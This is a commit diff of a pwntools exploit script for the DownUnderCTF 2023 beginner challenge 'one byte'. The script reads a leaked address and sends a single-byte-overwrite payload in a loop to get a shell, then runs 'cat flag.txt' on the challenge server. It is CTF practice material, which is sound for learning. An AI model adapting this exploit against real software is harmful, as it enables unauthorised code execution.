one byte done

DownUnderCTF 2023/beginner/one byte/onebyte.py

@@ -1,15 +1,17 @@
 from pwn import *
 import os
 
+os.environ["PWNLIB_DEBUG"] = "1"
+
 gs = '''
 unset env LINES
 unset env COLUMNS
 set follow-fork-mode child
-br *main
+br *main+93
 c
 '''
 
-elf = ELF(os.getcwd()+"/downunderflow")
+elf = ELF(os.getcwd()+"/onebyte")
 
 def start():
     if args.GDB:
@@ -17,12 +19,27 @@ def start():
     if args.REMOTE:
         return remote("2023.ductf.dev", 30018)
     else:
-        return process(os.getcwd()+"/downunderflow")
+        return process(elf.path)
 
-io = start()
+while True:
+    io = start()
 
-print(io.recvuntil("Your turn: "))
-io.send(cyclic(11))
+    io.recvuntil("Free junk: ")
+    x = io.recvline()
+    x = int(x[2:-1],16)
 
+    print(hex(x))
 
-io.interactive()
+    print(io.recvuntil("Your turn: "))
+    # io.send(p32(x+70)+ cyclic(8) + p32(x+70))
+    io.send(p32(x+70) +p32(x+70) +p32(x+70) + p32(x+70) + b"\x80")
+    io.sendline(b"cat flag.txt")
+    print(io.recvall(timeout=2))
+    # break
+    # try:
+    #     io.send(b"id")
+    #     print(io.recvline())
+    #     io.interactive()
+    # except:
+    #     io.close()
+    #     continue